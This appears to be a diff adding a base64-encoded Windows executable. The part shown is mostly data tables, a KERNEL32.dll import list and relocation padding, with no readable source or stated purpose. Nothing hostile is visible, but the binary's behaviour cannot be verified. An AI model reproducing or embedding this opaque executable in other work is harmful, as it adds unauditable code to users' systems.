+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAOBQQAAAAAAAAQAAAAAQAAAAAAAAAAAAALALQQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAA4AtBAAAAAAAAAAAAAAAAAPgLQQAAAAAAAAAAAAAAAADIC0EAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/////wAAAABQVUAA
+AAAAAEMAAAAAAAAAtOFAAAAAAADwbUAAqOFAAJD5QABQq0AAnOFAAJD5QACgqEAAkOFAAJD5QACg
+pUAAhOFAAJD5QAAwo0AAfOFAAJD5QADAm0AAAAAAAAAAAAAAAAAAAAAAAEMAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAABDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAEAAAAuAAAAAQAAAAAAAAAAAAAA0OFAAMDhQAD/////AAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAavtAAGr7QAAAACAAIAAgACAAIAAgACAAIAAgACgAKAAoACgAKAAgACAAIAAg
+ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABIABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAA
+EAAQAIQAhACEAIQAhACEAIQAhACEAIQAEAAQABAAEAAQABAAEACBAIEAgQCBAIEAgQABAAEAAQAB
+AAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAEAAQABAAEAAQABAAggCCAIIAggCCAIIA
+AgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACABAAEAAQABAAIAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAAwAsAAAAAAAAAHQAAwAQAAAAAAAAAlgAAwAQA
+AAAAAAAAjQAAwAgAAAAAAAAAjgAAwAgAAAAAAAAAjwAAwAgAAAAAAAAAkAAAwAgAAAAAAAAAkQAA
+wAgAAAAAAAAAkgAAwAgAAAAAAAAAkwAAwAgAAAAAAAAAAwAAAAcAAAB4AAAACgAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAQIECAAAAACkAwAAYIJ5giEAAAAAAAAApt8AAAAAAAChpQAAAAAAAIGf4PwAAAAAQH6A/AAA
+AACoAwAAwaPaoyAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIH+AAAAAAAAQP4AAAAAAAC1AwAAwaPa
+oyAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIH+AAAAAAAAQf4AAAAAAAC2AwAAz6LkohoA5aLoolsA
+AAAAAAAAAAAAAAAAAAAAAIH+AAAAAAAAQH6h/gAAAABRBQAAUdpe2iAAX9pq2jIAAAAAAAAAAAAA
+AAAAAAAAAIHT2N7g+QAAMX6B/gAAAAACAAAAcORAAAgAAABE5EAACQAAABjkQAAKAAAA9ONAABAA
+AADI40AAEQAAAJjjQAASAAAAdONAABMAAABI40AAGAAAABDjQAAZAAAA6OJAABoAAACw4kAAGwAA
+AHjiQAB4AAAAaOJAAHkAAABY4kAAegAAAEjiQAD8AAAAROJAAP8AAAA04kAAAAAAABCOQAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAMDqQAAABAAAtOpAAAkEAACg6kAACQQAAIzqQAAJBAAAgOpAAAkM
+AAB46kAAEwgAAGzqQAAJEAAAaOpAAAQMAABk6kAABBAAAFzqQAAEBAAASOpAAAQMAAA06kAABAgA
+ACDqQAAEEAAADOpAAAQEAAAI6kAABAgAAATqQAAEBAAAAOpAAAUEAAD46UAABQQAAPTpQAAGBAAA
+7OlAAAYEAADo6UAABwwAAOTpQAAHCAAA4OlAAAcEAADY6UAAEwQAAMjpQAATCAAAxOlAAAgEAADA
+6UAACQwAALzpQAAJEAAAuOlAAAkIAACw6UAACQQAAJzpQAAJBAAAkOlAAAkMAACE6UAACRAAAHjp
+QAAJGAAAbOlAAAkUAABg6UAACQgAAFTpQAAJBAAASOlAAAkEAABE6UAACRgAAEDpQAAJBAAAPOlA
+AAkUAAA46UAACggAADTpQAAKDAAAMOlAAAoEAAAs6UAACwQAACTpQAALBAAAIOlAAAwEAAAc6UAA
+DAgAABjpQAAMDAAAEOlAAAwEAAAA6UAADAgAAPDoQAAMDAAA4OhAAAwQAADc6EAADBAAANToQAAH
+BAAAxOhAAAcMAAC06EAABwgAAKzoQAAIBAAAqOhAAA4EAACc6EAADgQAAJDoQAAPBAAAgOhAAAkY
+AAB86EAADwQAAHjoQAAQBAAAcOhAABAEAABg6EAAEAgAAFzoQAAQCAAAUOhAABEEAABM6EAAEQQA
+AEjoQAASBAAAQOhAABIEAAA86EAAEwgAADjoQAATBAAANOhAABQIAAAw6EAAFAQAACToQAAUBAAA
+EOhAABQEAAD850AAFAgAAPjnQAAVBAAA8OdAABUEAADk50AAFggAAMznQAAWBAAAyOdAABYEAADE
+50AAFggAAMDnQAAZBAAAuOdAABkEAAC050AAGwQAAKznQAAbBAAApOdAAAoEAACU50AACggAAITn
+QAAKDAAAgOdAAB0EAAB450AAHQQAAHDnQAAHCAAAbOdAAB8EAABk50AAHwQAAGDnQAAJCAAAXOdA
+AAkEAABY50AACQQAAMDqQAAAAAAAUOdAAAEAAABM50AAPQAAAEDnQAA9AAAAOOdAACsAAAA050AA
+KwAAADDnQAAgAAAAKOdAACAAAAAk50AANwAAABznQAA3AAAAFOdAACwAAAAQ50AAAgAAAAjnQAAC
+AAAABOdAACkAAAD85kAAVgAAAPjmQABWAAAA9OZAACoAAAD46UAAKgAAAOzmQAAtAAAA4OlAADEA
+AADo5kAALQAAAODmQAAsAAAAMOlAACIAAAAs6UAAZgEAANjmQABmAQAAIOlAACEAAADQ5kAAIQAA
+AMzmQAAsAAAAxOZAADEAAADA5kAAHgAAALDmQAAsAAAAqOZAAB4AAACk5kAAVAMAAJzmQAAfAAAA
+kOZAAFQDAACE5kAAVAMAAKjoQAAkAAAAfOZAACQAAAB05kAAYgEAAGzmQABhAQAAaOZAAGEBAAB8
+6EAAYgEAAHjoQAAnAAAAYOZAACcAAABY5kAAUQAAAEzoQABRAAAASOhAAFIAAABQ5kAAUgAAAEzm
+QAA0AAAAROZAADQAAAA45kAAHwAAACzmQABAAAAAIOZAAEAAAAA46EAAHwAAADDoQAAvAAAAGOZA
+AC8AAAAU5kAAQAAAABDmQABAAAAADOZAADAAAAAE5kAAMAAAAPjlQABfAQAA7OVAAFYAAADg5UAA
+VgAAANzlQABfAQAAwOdAAAcAAADU5UAABwAAAMjlQABBAAAAxOVAAEEAAACs50AAKgAAALjlQABS
+AAAArOVAAFIAAACk5UAAIgAAAKDlQAAqAAAAnOVAAC4AAACU5UAALgAAAIjlQAApAAAAgOVAAHYD
+AAB85UAAWgAAAHTlQABaAAAAcOVAAHYDAABg50AALAAAAGDlQAAsAAAAUOVAAAEAAABA5UAALAAA
+ADDlQAABAAAAXOdAAAEAAABY50AAAQAAAAAAAAAAAAkEAAAAAAkQDAwAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAABkEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgEAAAAABMEAAAAABMIDAgAAAwEAAAA
+AAoEAAAAAAAAAAAAAA4EAAAAAAAAAAAAAAAAAAAAABAEAAAAAAAAAAAAAAcIDBAQCAUEGwQAAAcM
+AAAAAAkIAAAAAAYEAAAAAB0EAAAAABQEAAAAABUEAAAAAAcEAAAAAAAAAAAAABYIAAAAAAoIAAAA
+AAkYAAAAAA8EAAAAABYEAAAAAAAAAAAAAAAAAAAAAAsEAAAAAAAAAAAAAAAAAAAAAAkMAAAAAAAA
+AAAAAAAAAAAAAAkUAAAAAAQQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABEE
+AAAAABIEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB8EAAAA
+AAAAAAAAACC7QAAgu0AAILtAACC7QAAgu0AAILtAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAo7EAAJOxAACDsQAAc7EAAGOxAABTsQAAQ7EAACOxAAADsQAD460AA7OtA
+AODrQADY60AAzOtAAMjrQADE60AAwOtAALzrQAC460AAtOtAALDrQACs60AAqOtAAKTrQACg60AA
+nOtAAJTrQACI60AAgOtAAHjrQAC460AAcOtAAGjrQABg60AAVOtAAEzrQABA60AANOtAADDrQAAs
+60AAJOtAABDrQAAI60AAMAlBAAAAAAAAAAAALgAAAAAAAADoCUEA7AlBAOwJQQDsCUEA7AlBAOwJ
+QQDsCUEA7AlBAOwJQQDsCUEAf39/f39/f3/wCUEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAACAcAAAAQAAAPDx//8AAAAAUFNUAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFBEVAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgCkEAoApBAAAA
+AAAAAAAA/////wAAAAAAAAAAAAAAAP////8AAAAAAAAAAAAAAAD/////HgAAADsAAABaAAAAeAAA
+AJcAAAC1AAAA1AAAAPMAAAARAQAAMAEAAE4BAABtAQAAAAAAAP////8eAAAAOgAAAFkAAAB3AAAA
+lgAAALQAAADTAAAA8gAAABABAAAvAQAATQEAAGwBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAoIAEAAAAA
+AAAAAAAWJgEAGCEBAAAAAAAAAAAAAAAAAAAAAAAAAAAAJCQBABoiAQAmIgEAMiIBAEQiAQBQIgEA
+XCIBAHIiAQCCIgEAkCIBAKQiAQC4IgEAyiIBANgiAQDmIgEAAiMBABojAQAyIwEASiMBAGgjAQB+
+IwEAjCMBAJgjAQCoIwEAtiMBAMIjAQDUIwEA4iMBAPQjAQACJAEAEiQBAAgiAQBAJAEAViQBAHAk
+AQCGJAEAniQBALgkAQDSJAEA3iQBAOgkAQD0JAEAACUBABAlAQAgJQEAMCUBAEAlAQBUJQEAYiUB
+AHIlAQCCJQEAlCUBAKYlAQC4JQEAyCUBANYlAQDiJQEA8iUBAAQmAQAAAAAAJCQBABoiAQAmIgEA
+MiIBAEQiAQBQIgEAXCIBAHIiAQCCIgEAkCIBAKQiAQC4IgEAyiIBANgiAQDmIgEAAiMBABojAQAy
+IwEASiMBAGgjAQB+IwEAjCMBAJgjAQCoIwEAtiMBAMIjAQDUIwEA4iMBAPQjAQACJAEAEiQBAAgi
+AQBAJAEAViQBAHAkAQCGJAEAniQBALgkAQDSJAEA3iQBAOgkAQD0JAEAACUBABAlAQAgJQEAMCUB
+AEAlAQBUJQEAYiUBAHIlAQCCJQEAlCUBAKYlAQC4JQEAyCUBANYlAQDiJQEA8iUBAAQmAQAAAAAA
+iABGb3JtYXRNZXNzYWdlQQAAggFMb2NhbEZyZWUAWQFIZWFwRnJlZQAArgFSYWlzZUV4Y2VwdGlv
+bgAAUwFIZWFwQWxsb2MAxwFSdGxVbndpbmQAQgJXaWRlQ2hhclRvTXVsdGlCeXRlAOEAR2V0TGFz
+dEVycm9yAABiAEV4aXRQcm9jZXNzAB0CVGVybWluYXRlUHJvY2VzcwAAxABHZXRDdXJyZW50UHJv
+Y2VzcwCfAEdldENvbW1hbmRMaW5lQQA3AUdldFZlcnNpb24AAFUBSGVhcENyZWF0ZQAAZAFJbml0
+aWFsaXplQ3JpdGljYWxTZWN0aW9uAEQARGVsZXRlQ3JpdGljYWxTZWN0aW9uAE8ARW50ZXJDcml0
+aWNhbFNlY3Rpb24AAHcBTGVhdmVDcml0aWNhbFNlY3Rpb24AABECU2V0VW5oYW5kbGVkRXhjZXB0
+aW9uRmlsdGVyAMcAR2V0Q3VycmVudFRocmVhZElkAAAiAlRsc1NldFZhbHVlAB8CVGxzQWxsb2MA
+AP0BU2V0TGFzdEVycm9yAAAhAlRsc0dldFZhbHVlALgBUmVhZEZpbGUAAPgBU2V0RmlsZVBvaW50
+ZXIAABYAQ2xvc2VIYW5kbGUA+gFTZXRIYW5kbGVDb3VudAAA3ABHZXRGaWxlVHlwZQAWAUdldFN0
+ZEhhbmRsZQAAFAFHZXRTdGFydHVwSW5mb0EAJgJVbmhhbmRsZWRFeGNlcHRpb25GaWx0ZXIAAOkA
+R2V0TW9kdWxlRmlsZU5hbWVBAACLAEZyZWVFbnZpcm9ubWVudFN0cmluZ3NBAJMBTXVsdGlCeXRl
+VG9XaWRlQ2hhcgDQAEdldEVudmlyb25tZW50U3RyaW5ncwCMAEZyZWVFbnZpcm9ubWVudFN0cmlu
+Z3NXANIAR2V0RW52aXJvbm1lbnRTdHJpbmdzVwAAmABHZXRDUEluZm8AkgBHZXRBQ1AAAPYAR2V0
+T0VNQ1AAAE8CV3JpdGVGaWxlAGwBSXNCYWRSZWFkUHRyAABvAUlzQmFkV3JpdGVQdHIAaQFJc0Jh
+ZENvZGVQdHIAAAYCU2V0U3RkSGFuZGxlAACDAEZsdXNoRmlsZUJ1ZmZlcnMAACsAQ3JlYXRlRmls
+ZUEAdQFMQ01hcFN0cmluZ0EAAHYBTENNYXBTdHJpbmdXAAAXAUdldFN0cmluZ1R5cGVBAAAaAUdl
+dFN0cmluZ1R5cGVXAAADAUdldFByb2NBZGRyZXNzAAB4AUxvYWRMaWJyYXJ5QQAAXAFIZWFwUmVB
+bGxvYwBdAUhlYXBTaXplAADvAVNldEVuZE9mRmlsZQAA4wBHZXRMb2NhbGVJbmZvQQAA5ABHZXRM
+b2NhbGVJbmZvVwAAS0VSTkVMMzIuZGxsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAACYAAAAtTDI
+MOowIzE2MVYxcjGqMb0x4jEMMkMyVjIWM00zYDPmMx00MDSMNM40FzUoNZI1+DU0NkU2ZDagNrE2
+2TYmNzc3fDf3N/03Pjh3OIo4qDjhOPQ4MDmvOe45AToiOkk6gDqTOkU8WDx6PLM8xjzmPAI9Oj1N
+PXE9mz3SPeU9kD7YPus+DD9EP1c/jD/hPwAAACAAAPAAAAAAMDcwVjCRMLAwGjFJMWIxcDEcMioy
+fDKrMssy5zIRMy8z5TPwMww0OzRvNI40rzTONA01rTW4Ndw1AzYUNic2OTZVNmQ2jzagNr420zbv
+Nhk3Nzd5N4E3pzeyN8434TeTOKM4szjDONk47zj1OP44GjkqOTo5SjlaOXY5fDmFOaE5sTnBOdE5
+5zn9OQM6DDozOjk6SjpbOnU6jDqSOpg60DrgOvA6ADsWOyw7Mjs7O1c7Zzt3O4c7lzuzO7k7wjve
+O+47/jsOPCQ8OjxAPEk8ZTx1PIU8lTyuPMQ8yjzQPH89oT2sPb49ADAAAIgAAACzMLgw7jDzMDox
+PzGnMawxYDQQNSw1MTVcNWE1hjWiNac1CDYNNmU2gDaTNqA2uzbONts28jYRNyg3NTdMN1k3VDhZ
+OKw4sTjFOMo4+zgfOTI5lDmiOb051TkSO5g7rjvPO9s79jsGPBc8IzxbPJA8bD1zPYU92z0LPi8+
+PD5hPgBAAAB0AAAAUTC2MMAwVTH/MZMyzjLYMxk0gjScNKU0ojjAOPQ4Lzk8OWc5djm/Oc85/DkT
+Oh86LTr+Oik7OjsCPAw8GDwhPCw8OjxEPFk8bDx0PIo8oDy/PNc88zwCPRs9Kj04PTk+VD4IPyQ/
+QT9gPwAAAFAAAMQAAACRMJwwoTCuMLMwCjEYMR8xJTE4MUAxSTFSMWUxbDFxMX4xgzGeMakxDDIR
+MigyPTJDMkgyUzKCMocykTKbMrwywTLHMs0yMjNSM2szcDOCM4kzkTOZM6EzvDPxMxA0KjQxNEg0
+TzRWNHA0ojS4NL80xjTgNBI1MTU+NUQ1STV+NYY1mjWxNbg1yDXNNe419TUINic2RDZLNlI2cDZ3
+Noo2pjYiNz43uDfQN1s4rji4OK45uDlrOow/kT8AAABgAAB8AAAAHDEhMWwycTJsNHE0aDWANRY2
+KDZRNks3XDd4N7s30jeHOAQ5uDnQOVY6YDqZOiY7NjtqO3k7bjyMPJA8lDyYPJw8oDykPKg8rDyw
+PBQ9Jj1BPV09Zj17PYQ9lT2bPag9rj09Pkk+Vj5rPlY/aD+EP84/1T8AcAAAvAAAAK8wtjDoMIsx
+kjFWMvQyyTXmNf01UDbQN9Q32DfcN+A35DfoN+w38Df0N/g3/DcAOAQ4HDggOCQ4KDgsOGA4ZDho
+OGw4cDh0OHg4fDiAOIQ4iDiMOJA4lDiYOJw4oDgcOiI6STpdOpM6mjq5Ouk68zoMOyY7RztwO347
+tzu+O+U76zsEPBc8RzxUPFk8fzyOPKA8sTzSPPE8DT03PUU9bz2FPaQ92z1EPl4+MD84P5U/sD8A
+AACAAAAAAQAAijCQMLEwtzBmMYQxqjHdMfYxYTKLMpQymTKfMqoyDDMSM2szrzOSNLM09TT/NBA1
+IDUsNUo1mzXCNdg16TX5NQY2RjZrNrI28jYGNxQ3IjdaN3g3iDeaN7w32jfgN/83DDgROB84KDhO
+OFM4Wjh8OMI41TjfOOo49Dj/OAg5IjkpOUg5TDlQOVQ5WDl0OYE5hjmMOZE5kTqgOrU62TrxOvo6
+DTsaOyM7STtWO6I7sDvxOyQ8WTx4PIg8kDyuPMc81jzcPOg8+jwXPR09JT0tPTI9Pj1+PZE9nD2h
+PcI94j39PRw+IT6cPqE+vj4TP3E/tz/OP94/AAAAkAAAlAAAABkwQjBKMKgwuTDSMPIwATEQMVgx
+aDGIMbEx9jEPMlcyfjKZMscy0zITMxgzHDMgMyQzeTOsM7AztDO4M7wzHzQ5NEk0hDSONOg0ADWY
+NU82ejaWNqQ3GDgfOBU5tjnGOew59zn9OUk6eDt8O4A7hDuIO8I7DTwTPCE8Mjw6PD48QzxRPGI8
+eDyGPAAAAKAAAOAAAAA5M0AzSzNfM3MzhzOZM6cztTPJM88z1jPeM+Uz9TMHNBg0HjQmNCw0NTQ6
+NEM0UDRZNGE0bzR9NI40lDSaNKo0sjTINNs05DQHNRA1KDU3NUE1ojXuNfc1AjYONhQ2IzY0Njs2
+QzZMNlI2XDZgNmY2dDaFNp02PTivOLs4wjjKOFU5XTl+OSA6ajpwOnY6fjqNOpQ6mzqrOgw7EjsY
+Ox07Kzs7O0A7JjxCPFI8cDyhPMM8/DwNPSE9Qj5RPlo+eT6GPp4+pz7APsU+8D4GPyE/YD96P68/
++j8AsAAA7AAAABgwOTClMLYwvjDMMN4w6DDyMAgxDjE1MVAxbjG1Md0x/zFkMnYyfjKbMqMyvjLD
+MtYy+jIRMygzVDNqM5cznjOkM68ztTO9M8YzzjPTM9sz4DPyM/wzFDRgNGY0gDSTNKY0sDS9Nd81
+ZjYvN1k3aTeKN7E34jfxNxI4KjgvOFQ4azh/OLA4zDj0OBI5ITlCOVo5XzmEOZs5rznnOQo6NTpe
+OqU6rjoAO0k7UDtlO2s7lTubO6U7qzu1O7s7RjxLPGw8cjzYPNw84DzkPOg87DzwPPQ8JT1lPfU9
+Hz41PlQ+iz4AAADAAAAUAAAAgjCpMAAxCTFpMQAAAOAAAIAAAAAAMQQxLDEwMTwxQDFQMVgxXDFk
+MWgxdDF4MQg1EDUUNSA1KDUsNXw8gDyUPJg8oDy8PNw87Dz0PBQ9JD0wPTg9aD18PYg9kD2sPbQ9
+0D3cPeQ98D34PRQ+MD48PkQ+UD5YPnQ+kD6cPqQ+sD64PtQ+8D78PgQ/AAAA8AAAWAAAAAQwEDAU
+MCAwODBIMCw0MDQ4NFA00DXYNaw4xDjkOPQ4BDmIOZg5oDmkOag5rDmwObQ5uDm8OcA5xDnIOcw5
+0DnUOdg53DkwOzQ7YDtkOwAAAAABACACAAAcMCQwLDA0MDwwRDBMMFQwXDBkMGwwdDB8MIQwjDCU
+MJwwpDD4MAAxCDEQMRgxIDEoMTAxODFAMUgxUDFYMWAxaDFwMXgxgDGIMZAxmDGgMagxsDG4McAx
+yDHQMdgx4DHoMfAx+DEAMggyEDIYMiAyKDIwMjgyQDJIMlAyWDJgMmgycDJ4MoAyiDKQMpgyoDKo
+MrAyuDLAMsgy0DLYMuAy6DLwMvgyADMIMxAzGDMgMygzMDM4M0AzSDNQM1gzYDNoM3AzeDOAM4gz
+kDOYM6AzqDOwM7gzwDPIM9Az2DPgM+gz8DP4MwA0CDQQNBg0IDQoNDA0ODRANEg0UDRYNGA0aDRw
+NHg0gDSINJA0mDSgNKg0sDS4NMA0yDTQNNg04DToNPA0+DQANQg1EDUYNSA1KDUwNTg1QDVINVA1
+WDVgNWg1cDV4NYA1iDWQNZg1oDWoNbA1uDXANcg10DXYNeA16DXwNfg1ADYINhA2GDYgNig2MDY4
+NkA2SDZQNlg2YDZoNnA2eDaANog2kDaYNqA2qDawNrg2wDbwOPQ4+Dj8OAA5BDkwOTQ5ODk8OUA5
+RDlIOUw5UDlUOVg5XDlgOWQ5aDlsOXA5dDl4OXw5gDmEOYg5jDmQOZQ5mDmcOaA5pDmoOaw5sDm0
+Obg5vDnAOcQ5yDnMOdA51DnYOdw58Dn0Ofg5/DkAOgQ6CDoMOhA6FDogOuA65DoAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
